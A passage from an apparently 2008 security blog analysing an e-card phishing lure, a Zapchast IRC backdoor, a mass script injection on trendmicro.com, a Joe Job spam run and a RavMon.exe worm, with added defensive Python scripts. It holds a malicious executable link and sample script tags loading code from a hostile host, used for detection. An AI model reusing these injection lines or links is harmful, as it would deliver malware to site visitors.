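<a href="http://pop.ayudaenaccion.org.sv/card.exe">http://www.hallmark.com/ECardWeb/ECV.jsp?a=[snip]</a></p>
<p>1. Visit <a href="http://www.hallmark.com/getecard">http://www.hallmark.com/getecard</a></p>
<p>Want to send an E-Card too ? Visit <a href="http://www.hallmark.com/ecards">www.hallmark.com/ecards</a></p>
</body></html>"""


if __name__ == "__main__":
    for finding in audit_links(SAMPLE_MAIL):
        print(finding["href"], "->", "; ".join(finding["reasons"]))
```

The two later links pass because text and target agree; the first fails on both counts, which is exactly what a mail gateway rule (or a suspicious user hovering over the link) should catch.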

VirusTotal detection is not bad.

Files dropped are as follows:
%systemroot%\system32\nicks.txt
%systemroot%\system32\remote.ini
%systemroot%\system32\script.ini
%systemroot%\system32\servers.ini
%systemroot%\system32\sup.bat
%systemroot%\system32\sup.reg
%systemroot%\system32\users.ini
%systemroot%\system32\aliases.ini
%systemroot%\system32\control.ini
%systemroot%\system32\explorer.exe
%systemroot%\system32\mirc.ico
%systemroot%\system32\mirc.ini


Payload is Zapchast, a mIRC-based backdoor: the dropped files are a hidden mIRC client plus its scripts (the explorer.exe in System32 is presumably the renamed mIRC binary; the real one lives in %systemroot%), and it tries to join the machine to an IRC-controlled botnet.

Added:
The remote.ini it drops onto your machine has some interesting host names you might want to block and/or investigate:

[users]
n0=100:*!*@lamerzkiller.users.undernet.org
n1=100:*!*@209.43.75.13
n2=100:*!*@estranho-colo.iquest.net
n3=100:*!*@OMGyouSUCK.users.undernet.org
n4=100:*!*@CoReCt.users.undernet.org
n5=100:*!*@hxr.users.undernet.org
n6=100:*!*@BebiDeea.users.undernet.org
n7=100:*!*@asdz.users.undernet.org
n8=100:*!*@ZmAu.users.undernet.org
n9=100:*!*@ReKt.users.undernet.org
n10=100:*!*@BebeDulce.users.undernet.org
n11=100:*!*@ReCt.users.undernet.org
n12=100:*!*@hacler.ro
[variables]
n0=%HAck1 #GangstaRap | #:">
n1=%console
n2=%utime 1205420752
n3=/away :sã îmi suge-ti cuca zdrentzelor !
n4=%ochan #GangstaRap | #:">
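Rather than eyeballing the file, it is worth pulling the indicators out of remote.ini programmatically, since the same bot family ships with different controller lists. The script below is an added example (not from the original post): mIRC's [users] entries are level:nick!user@host masks, so the part after "@" is the hostmask the bot will accept commands from, and the channel names sit in [variables]. It also separates the Undernet "*.users.undernet.org" masks, which are account cloaks you cannot block at the firewall, from the real hosts and IPs that you can. The sample is the page's own remote.ini, abridged.

```python
"""Extract controller hostmasks and channels from a Zapchast-style mIRC remote.ini."""
import re

CHANNEL = re.compile(r"#[A-Za-z0-9_\-]+")


def parse_ini(text):
    """Minimal INI reader: {section: [(key, value), ...]}. Written by hand so
    mIRC's values (with '%', '|' and ':' in them) are kept verbatim."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current].append((key.strip(), value.strip()))
    return sections


def extract_iocs(text):
    sections = parse_ini(text)
    hosts = set()
    for _, value in sections.get("users", []):
        mask = value.split(":", 1)[1] if ":" in value else value  # drop the access level
        hosts.add(mask.rsplit("@", 1)[-1])                        # host part of nick!user@host
    channels = set()
    for _, value in sections.get("variables", []):
        channels.update(CHANNEL.findall(value))
    # Undernet cloaks identify an IRC account, not a network address.
    blockable = sorted(h for h in hosts if not h.endswith(".users.undernet.org"))
    return {"hosts": sorted(hosts), "blockable": blockable, "channels": sorted(channels)}


# The page's remote.ini, abridged (away message and timestamp lines left out).
SAMPLE_REMOTE_INI = """[users]
n0=100:*!*@lamerzkiller.users.undernet.org
n1=100:*!*@209.43.75.13
n2=100:*!*@estranho-colo.iquest.net
n3=100:*!*@OMGyouSUCK.users.undernet.org
n4=100:*!*@CoReCt.users.undernet.org
n5=100:*!*@hxr.users.undernet.org
n6=100:*!*@BebiDeea.users.undernet.org
n7=100:*!*@asdz.users.undernet.org
n8=100:*!*@ZmAu.users.undernet.org
n9=100:*!*@ReKt.users.undernet.org
n10=100:*!*@BebeDulce.users.undernet.org
n11=100:*!*@ReCt.users.undernet.org
n12=100:*!*@hacler.ro
[variables]
n0=%HAck1 #GangstaRap | #:">
n1=%console
n4=%ochan #GangstaRap | #:">
"""


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_REMOTE_INI)
    print("block at the perimeter:", iocs["blockable"])
    print("watch for joins to:", iocs["channels"])
    print("all controller masks:", len(iocs["hosts"]))
```

On a network, the more useful detection is outbound IRC (TCP 6667 and friends) to Undernet servers from a desktop that has no business talking IRC at all; the hostmasks tell you who is driving it.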

trendmicro.com compromised - sort of.

McAfee has flagged up another mass defacement on their blog here, various sites have been injected with a reference to hxxp:||www.2117966.net|fuckjp.js (I assume that you can undo the trivial obfuscation if you really, really want to look).

A Google search for 2117966 fuckjp.js shows over 9000 hits. Obviously you won't want to visit any of these infected sites, so take care.

However, one of the sites showing up is trendmicro.com (see screenshot). At the time of writing, the Trend Micro site has been cleaned up, and it looks as though the infection wouldn't have worked on that particular site. Nonetheless, it is always worrying when you see a security vendor site compromised in this way. This isn't the first time this has happened to this type of site - CA.com was infected back in January.


The Google cache gives away the infection (use WGET, SamSpade or a non-Windows machine to examine the cache, never a full blown browser on a Windows system).

This is the current (clean) version of www.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_LINEAGE&VSect=St


The infected version (from the cache) shows the altered code:


A close look at the code shows that the injection has been borked somewhat and wouldn't actually work. However, there were potentially hundreds of infected pages, some of which may have been more successful in injecting malware.
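If you are checking your own pages for this campaign (on saved copies fetched with wget, as above, never in a browser), the distinction between an injection that works and one that has been "borked" matters. The script below is an added example, not from the original post: it reports script and iframe references to hosts you do not control, and splits them into ones the browser would actually act on (real elements) and ones that only appear inside an attribute value or similar, which never execute but still prove the page was injected. The HTML samples are constructed; the 2117966.net reference is the one the post describes.

```python
"""Find foreign script/iframe references in saved HTML, active or inert."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Raw-text search: catches an injected tag wherever it landed, even inside an attribute.
RAW_REF = re.compile(r"<(?:script|iframe)[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


class RefCollector(HTMLParser):
    """Collects src= of script/iframe elements a browser would actually load."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append(src)


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def foreign_refs(html, own_hosts):
    """{'active': [...], 'inert': [...]} of external script/iframe URLs.
    Relative and same-host URLs are never reported."""
    own = {h.lower() for h in own_hosts}

    def is_foreign(url):
        host = host_of(url)
        return bool(host) and host not in own

    parser = RefCollector()
    parser.feed(html)
    active = sorted({u for u in parser.refs if is_foreign(u)})
    raw = {u for u in RAW_REF.findall(html) if is_foreign(u)}
    return {"active": active, "inert": sorted(raw - set(active))}


def scan_files(paths, own_hosts):
    """Run foreign_refs over saved pages; returns {path: result} for pages with findings."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            result = foreign_refs(fh.read(), own_hosts)
        if result["active"] or result["inert"]:
            report[path] = result
    return report


# Constructed samples: a working injection, one stuck inside an attribute, and a clean page.
LIVE = '<html><body><h1>Details</h1><script src="http://www.2117966.net/fuckjp.js"></script></body></html>'
BORKED = ('<html><body><input type="hidden" name="GNAME" '
          'value="TSPY_LINEAGE<script src=http://www.2117966.net/fuckjp.js></script>"></body></html>')
CLEAN = '<html><head><script src="/js/site.js"></script></head><body>ok</body></html>'


if __name__ == "__main__":
    for name, page in (("live", LIVE), ("borked", BORKED), ("clean", CLEAN)):
        print(name, foreign_refs(page, ["www.trendmicro.com"]))
```

An "inert" hit is still a compromised database: the same stored value may be rendered as a real element on another template, so treat both lists as cleanup work, but prioritise the active ones.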

The date of the Google cache is on or about 4th March, so a week ago.

2117966.net is on 125.46.105.224 in China, at the time of writing the site is down, however the Google cache comes up with something funny for the front page:


Hacker humour?

Anyway, I have no particular axe to grind against Trend Micro, they have a decent set of products and are one of the more useful companies in the security arena. Again, it just goes to show that even trusted sites can be compromised.

Monday, 10 March 2008

Truckerjobsearch.com - spam, scam or stupidity?

I'm not interested in trucks, there is no reason for anyone to send me an email about trucking. And usually, when I see email about "transportation" jobs, then it tends to be some sort of money mule scam.

So a spam email advertising truckerjobsearch.com rang alarm bells - it certainly seemed to tick all the boxes for a scam operation. But is it a scam?

Trucking Companies & Trucking Recruiters
Need to Hire More Class A Truck Drivers?
Let Trucker Distribution Inc Save your Recruiters Time & Money.

LIMITED TIME OFFER
ONLY $400.00 per month

FREE TOP BANNER ON ALL FOUR WEBSITES

NOW for ONLY $400.00 per month you can:

Receive on Average 30-50 New Truck Driver Applications Daily
(Depending on your company criteria)
Get a Top Banner on Four Premium Websites

Get a Side Profile Banner on Four Premium Websites
Hire More CDL Truck Drivers for Less
Cut Your Recruiting Budget in Half

NewTruckDrivingJobs.com
MonsterTruckDriverJobs.com
TruckerGeek.com
TruckerJobSearch.com
We are so confident in our service, that we will give your company a
FREE 24 Hour Trial via our E-MAIL system.
(Applications over the web)

Combination Rates

"All 4 Websites"
Daily Applications via Email
Side Profile Banners
Only $500.00 per month

"All 4 Websites"
Daily Applications via Email
Side Profile Banners
Data Base Access
Only $600.00 per month

"All 4 WebSites"
Daily Applications via Email
Side Profile Banners
Database Access
Featured Top Banner
Only $700.00 per month

"All 4 WebSites"
Daily Applications via Email
Side Profile Banners
Database Access
Featured Top Banner + Bottom Banners
Plus Brochure Distribution
Only $800.00 per month
---------------------------------------------------------
Individual Services:

"Brochure Distribution"
Only $450.00 per month
(150 Truck Stops )

"Top Banner"
Only $250.00 per month
(Website of Choice)

"Bottom Banner"
Only $200.00 per month
(Website of Choice)

Let Trucker Distribution build a custom package for your company TODAY!


For a FREE Trial Click Here or Call:1-888-675-5551

Originating IP is 199.239.248.221 which identifies itself as truckerout.com, the spamvertised site is hosted on 161.58.218.47. Both servers are hosted by NTT America Inc.

An investigation into the domain names and registration details shows that the sites appear to be legitimate, the sending IP address and the rDNS matches the advertised sites. There is no indication that these sites are not exactly what they say they are. So what gives?

The most common explanation for seeing spam of this type is that the operators have been conned into buying a CD that promises millions of email addresses for a very low price. Very often, these are simply scraped from web sites, or can even be just completely made up.

In all likelihood, the person marketing for this company has bought a bad mailing list in good faith. It doesn't mean that they are not a spammer (the email is certainly not CAN SPAM compliant), but it goes to demonstrate just how easy it is to damage your reputation by mismanaging an email campaign. Buying in mailing lists is best avoided, and even reputable list brokers can sell lists that have been contaminated with bad data. The only real way to be certain is to collect your own lists; if you have to buy them in then you need to research the company you are dealing with to ensure that they really exist and are wholly above board.

Thursday, 6 March 2008

StampOffers.com - Spam or Joe Job?


There's a whole bunch of spam doing the rounds as follows:

Subject: Sell for FREE Forever !!!!!!!!!!!!!!
From: stampoffers@yahoo.com
Date: Thu, March 6, 2008 3:21 pm

The idea for StampOffers.com developed in the summer of 2002.
It all started with the creation of a chat board outside of eBay that would allow fellow philatelists the ability to talk about anything without being criticized for not maintaining a strictly philatelic conversation. Those who have made a non-philatelic post to the eBay stamp chat board know what it is like. There was a discovery on this new chat board that collectors would like to buy, sell, and trade among those who visited the chat and a few of the frequent users asked about someone starting an auction site just for stamp collectors. In January of 2003, StampOffers.com was launched!

There was much back and forth about whether StampOffers.com would be able to draw enough users and continue a steady growth and it was decided that the only way to do this was to operate with one philosophy – provide a viable alternative on the world wide web in which collectors from around the world could buy, sell, and trade stamps in an effort to further the hobby. Oh yeah…..and do it for FREE!!

To this day, StampOffers.com provides a site that allows sellers to enter a basic listing with NO INSERTION FEE and NO FINAL VALUE FEE. So how does StampOffers.com continue to operate without collecting fees? Well, let’s just say it is a combination of fellow collectors who are very appreciative of StampOffers.com’s existence combined with StampOffers.com’s desire to contribute to the hobby of philately!

Therefore, go ahead and use the site as much as you wish! The only real favor that is asked is that you pass the word about StampOffers.com. Tell your customers, your fellow collectors, your stamp club friends, your local stamp dealer, and anyone else whom you believe would be as appreciative of the site as those who are using it today.

Thank you,

StampOffers.com - The World Is Finding Us!

Join Now

James Munch

You are receiving this mailing because you agreed to be a part of our opt in mailing list.

As you would expect, no such "opt in" authorisation has been given.

There are a few things that are odd about this spam. First, it seems quite unlikely that a philately site would send out this type of email. Second, the mail is sent out repeatedly to the same address (in an apparent attempt to annoy the recipient). Third, it has been aimed at a spamcop.net account, which perhaps indicates that "reverse listwashing" is taking place: deliberately targeting addresses that are likely to report it, to ensure that the mail does get reported as spam.

These are all classic indications of a Joe Job - a fake spam message sent by a third party in order to cause trouble, presumably in an attempt to shut StampOffers.com down. Joe Jobs can be hard to spot, but this certainly seems to tick all the boxes.

As of 6th March 2008, the emails are being sent from a server at 74.86.158.8 through a PHP script which fingers 64.74.124.39 as the possible sending IP. This latter IP address is interesting because it belongs to an Autosurf scheme called autosurfunion.com; interestingly, the same server has been used for this other apparent stamp-related Joe Job, so presumably the autosurf server is being used as a proxy.

The line in the header to look for is:
X-PHP-Script: 74.86.158.8/~ez123/conf.php for 64.74.124.39

64.74.124.39 is operated by Globalcon.net (contact email appears to be reyner -at- globalcon.net), so try sending any abuse reports their way. Also the 74.86.158.8 server with the insecure redirector should be reported to abuse -at- greenolivetree.net or perhaps via their web form.
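As an added example (not code from the original post), here is a small Python check that pulls the X-PHP-Script line and the Received chain out of a raw message, so that the two parties named above can each be reported to the right provider. The message in SAMPLE_MESSAGE is constructed for the demonstration: only the X-PHP-Script value is the one quoted above, and the surrounding host names and addresses are placeholders. The parser assumes the header layout the post shows, "host/path for client-ip".

```python
"""Pull the X-PHP-Script line and the Received chain out of a raw message.

Added example, not code from the original post. It assumes the header
format quoted in the post, "X-PHP-Script: <host>/<path> for <client-ip>";
the surrounding headers in SAMPLE_MESSAGE are constructed placeholders.
"""
import re
from email import message_from_string

# Constructed sample: only the X-PHP-Script value is the one from the post.
SAMPLE_MESSAGE = """\
Received: from webhost.example (webhost.example [74.86.158.8])
\tby mx.example.net with ESMTP id abc123
\tfor <recipient@example.net>; Thu, 6 Mar 2008 15:21:00 +0000
From: StampOffers.com <noreply@example.org>
To: recipient@example.net
Subject: StampOffers.com - The World Is Finding Us!
X-PHP-Script: 74.86.158.8/~ez123/conf.php for 64.74.124.39
Date: Thu, 6 Mar 2008 15:21:00 +0000

(body omitted)
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
PHP_SCRIPT_RE = re.compile(
    r"^(?P<host>[^/\s]+)(?P<path>/\S*)\s+for\s+(?P<client>" + IPV4 + r")")
RECEIVED_IP_RE = re.compile(r"\[(" + IPV4 + r")\]")


def parse_php_script(value):
    """Split an X-PHP-Script value into script host, script path and client IP."""
    m = PHP_SCRIPT_RE.match(value.strip())
    if not m:
        return None
    return {"script_host": m.group("host"),
            "script_path": m.group("path"),
            "client_ip": m.group("client")}


def received_ips(msg):
    """Bracketed IPs from the Received headers, most recent hop first."""
    ips = []
    for hdr in msg.get_all("Received", []):
        ips.extend(RECEIVED_IP_RE.findall(hdr))
    return ips


def analyse(raw):
    """Summarise where the message was generated and who to report it to."""
    msg = message_from_string(raw)
    result = {"php_script": None, "received_ips": received_ips(msg),
              "report_to": []}
    value = msg.get("X-PHP-Script")
    if value:
        parsed = parse_php_script(value)
        result["php_script"] = parsed
        if parsed:
            # The host running the script and the client that invoked it are
            # two different parties; the post reports each to its own provider.
            result["report_to"] = [parsed["script_host"], parsed["client_ip"]]
            # Cross-check: the script host should also be the first sending
            # hop in the Received chain; a mismatch suggests a forged header.
            result["script_host_matches_hop"] = (
                bool(result["received_ips"])
                and result["received_ips"][0] == parsed["script_host"])
    return result


if __name__ == "__main__":
    for key, val in analyse(SAMPLE_MESSAGE).items():
        print(f"{key}: {val}")
```

Run it against the full raw source of a received message (headers and body) rather than the rendered view; the Received chain is the only part of the header that a forger cannot retroactively edit once it has passed through your own mail server.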

Incidentally, this is what StampOffers.com has to say on the subject:

24 February 2008 - SPAM EMAILS

This is a special announcement about a rash of SPAM emails going out.

First, let me apologize for this occurring. StampOffers.com does NOT send out SPAM emails!! The only emails that are sent are to those who are members of StampOffers.com.

Recently, there was an individual who gained access to the site as a bidder and placed a number of fake/fraudulent bids. This user created 3 different IDs and attempted to wreak havoc with each one. It appears we have finally been able to block this person from accessing the site, and thus he has turned to another form of cowardly entertainment.

These emails ARE NOT coming from StampOffers.com, our host, nor any server that our host runs. Our host is working with me to file the proper complaints as seen below:

I am trying everything I can to stop this and apologize to everyone. I would like to ask your assistance. When receiving these emails, contact the ISP you find in the header and point them to this board.

I am a private individual who has been running this site for 5 years. I have no interest in making money (I provide the site for FREE for everyone to use) and definitely have no desire to send out SPAM emails.

Please, if you have any questions, feel free to use the contact button below and let me know.

Thank you for your patience and understanding.

James C. Munch

I tend to concur with StampOffers.com: there are lots of signs to indicate that this is a Joe Job attack, so if you receive one, please analyse the headers carefully and report it to the correct service provider.

Monday, 3 March 2008

RavMon.exe virus on new Toshiba Satellite laptop

A few days ago I bought a very inexpensive Toshiba Satellite L40-18Z laptop from Comet in the UK. It's a basic laptop running Windows Vista, and it is certainly good enough for web browsing and word processing.

But this particular laptop came with something extra. Despite the security seals being intact, and the OS having never been activated, the laptop came with a file called RavMon.exe on the C: and E: partitions.

RavMon.exe is an insidious virus that spreads on USB keys and drives, so it seems likely that this laptop was infected during the manufacturing process, despite having Symantec Anti-virus installed.

Of course, the first thing I did was remove Symantec and install ZoneAlarm, and ZA's Kaspersky anti-virus engine found RavMon.exe pretty much straight away. Thinking it was a false positive, I sent it to VirusTotal and the results speak for themselves.

File RavMon.exe received on 03.03.2008 20:38:32 (CET)

Antivirus          Version        Last Update  Result
AhnLab-V3          2008.3.4.0     2008.03.03   Win-Trojan/Xema.variant
AntiVir            7.6.0.73       2008.03.03   TR/Agent.Abt.33
Authentium         4.93.8         2008.03.02   W32/Trojan.NAT
Avast              4.7.1098.0     2008.03.02   Win32:Agent-EDN
AVG                7.5.0.516      2008.03.03   Generic3.NKU
BitDefender        7.2            2008.03.03   Trojan.Downloader.Chacent.A
CAT-QuickHeal      9.50           2008.03.03   Trojan.Agent.abt
ClamAV             0.92.1         2008.03.03   Trojan.Agent-3327
DrWeb              4.44.0.09170   2008.03.03   Win32.HLLW.Autoruner.198
eSafe              7.0.15.0       2008.02.28   Suspicious File
eTrust-Vet         31.3.5582      2008.03.03   Win32/Compfault.C
Ewido              4.0            2008.03.03   Trojan.Agent.abt
FileAdvisor        1              2008.03.03   -
Fortinet           3.14.0.0       2008.03.03   -
F-Prot             4.4.2.54       2008.03.02   W32/Trojan.NAT
F-Secure           6.70.13260.0   2008.03.03   W32/Agent.CUTV
Ikarus             T3.1.1.20      2008.03.03   Trojan.Win32.Agent.abt
Kaspersky          7.0.0.125      2008.03.03   Trojan.Win32.Agent.abt
McAfee             5243           2008.03.03   New Malware.eb
Microsoft          1.3301         2008.03.03   Worm:Win32/RJump.F
NOD32v2            2918           2008.03.03   Win32/AutoRun.FQ
Norman             5.80.02        2008.03.03   W32/Agent.CUTV
Panda              9.0.0.4        2008.03.03   Generic Malware
Prevx1             V2             2008.03.03   Generic.Malware
Rising             20.34.02.00    2008.03.03   Trojan.DL.MnLess.n
Sophos             4.27.0         2008.03.03   Troj/QQRob-ADL
Sunbelt            3.0.906.0      2008.02.28   -
Symantec           10             2008.03.03   W32.Nomvar
TheHacker          6.2.92.231     2008.03.02   -
VBA32              3.12.6.2       2008.02.27   Trojan.Win32.Agent.abt
VirusBuster        4.3.26:9       2008.03.03   Packed/nPack
Webwasher-Gateway  6.6.2          2008.03.03   Trojan.Agent.Abt.33

Additional information
File size: 48640 bytes
MD5: 5557dd0fd5565f12a71c92e6aad7088f
SHA1: 1dd1be78715ff68354967adadc8b6990706caafa
PEiD: -
packers: NPack

Luckily, the machine wasn't actually infected, but the .exe file was sitting there waiting to be clicked. Symantec would have detected it if its signatures had been updated in time, and as the results above show, most AV products will now detect the virus.

It just goes to show that you can't necessarily trust a PC straight out of the box.
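As an added example that is not code from the original post or from any AV vendor, here is a Python check of the kind you could run against a freshly unboxed machine or a USB key before anything is clicked: it parses autorun.inf in a drive root, hashes whatever that file would launch, and compares the hashes with the MD5 and SHA1 that VirusTotal reported above. It assumes this family spreads through an autorun.inf entry pointing at the dropped executable (as the Worm:Win32/RJump.F and Win32/AutoRun.FQ names suggest). The drive contents produced by build_sample_drive() are a constructed stand-in, not the real sample, so in the demonstration the file is reported as launched-but-unknown rather than as a hash match.

```python
"""Check a drive root for an autorun.inf launcher and hash what it starts.

Added example, not code from the original post or from any AV vendor.
Assumes the worm relies on an autorun.inf entry that points at the dropped
executable; the drive layout built below is constructed, not the real sample.
"""
import hashlib
import os
import re
import tempfile

# Indicators of compromise taken from the VirusTotal report in the post.
KNOWN_BAD = {
    "md5": {"5557dd0fd5565f12a71c92e6aad7088f"},
    "sha1": {"1dd1be78715ff68354967adadc8b6990706caafa"},
}
# File names worth hashing even when no autorun.inf references them.
SUSPECT_NAMES = {"ravmon.exe"}

# [autorun] keys that start a program: open=, shellexecute= and
# shell\<verb>\command=. Windows reads the file case-insensitively.
LAUNCH_KEY_RE = re.compile(
    r"^(open|shellexecute|shell\\[^=\\]+\\command)\s*=\s*(.+?)\s*$", re.I)


def first_token(cmd):
    """Executable part of a command line, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0] if cmd else ""


def launched_programs(autorun_text):
    """Program names referenced by launch keys in the [autorun] section."""
    programs, in_autorun = [], False
    for line in autorun_text.splitlines():
        s = line.strip()
        if not s or s.startswith(";"):
            continue
        if s.startswith("["):
            in_autorun = s.lower() == "[autorun]"
            continue
        m = LAUNCH_KEY_RE.match(s) if in_autorun else None
        if m:
            programs.append(first_token(m.group(2)))
    return programs


def file_hashes(path):
    """MD5 and SHA1 of a file, read in chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def check_drive(root, known_bad=KNOWN_BAD):
    """Report every program autorun.inf would launch, plus suspect names.

    Only files directly in the drive root are resolved; a launcher that
    points into a subdirectory is reported as missing.
    """
    present = {n.lower(): n for n in os.listdir(root)}
    referenced = {}
    if "autorun.inf" in present:
        with open(os.path.join(root, present["autorun.inf"]), errors="replace") as f:
            for prog in launched_programs(f.read()):
                referenced.setdefault(prog.lower(), prog)
    candidates = dict(referenced)
    for key in present.keys() & SUSPECT_NAMES:
        candidates.setdefault(key, present[key])
    findings = []
    for key, shown in sorted(candidates.items()):
        actual = present.get(key)
        if actual is None:
            findings.append({"file": shown, "status": "launched by autorun.inf but missing"})
            continue
        md5, sha1 = file_hashes(os.path.join(root, actual))
        if md5 in known_bad["md5"] or sha1 in known_bad["sha1"]:
            status = "known bad (hash match)"
        elif key in referenced:
            status = "launched by autorun.inf, hash unknown"
        else:
            status = "suspect file name, hash unknown"
        findings.append({"file": actual, "md5": md5, "sha1": sha1, "status": status})
    return findings


def build_sample_drive():
    """Constructed stand-in for an infected drive root (not the real files)."""
    root = tempfile.mkdtemp(prefix="usbroot_")
    with open(os.path.join(root, "autorun.inf"), "w") as f:
        f.write("[AutoRun]\r\nopen=RavMon.exe\r\nshellexecute=RavMon.exe\r\n"
                "shell\\open\\Command=RavMon.exe\r\n")
    with open(os.path.join(root, "RavMon.exe"), "wb") as f:
        f.write(b"MZ placeholder bytes, not the real sample\n")
    return root


if __name__ == "__main__":
    for finding in check_drive(build_sample_drive()):
        print(finding)
```

On a real machine, point check_drive() at each drive root (C:\, E:\, and any removable media) from a system where autorun is disabled; anything reported as launched by autorun.inf deserves a second look even when its hash is not yet on a known-bad list, since the file in the post took most vendors a few days to add.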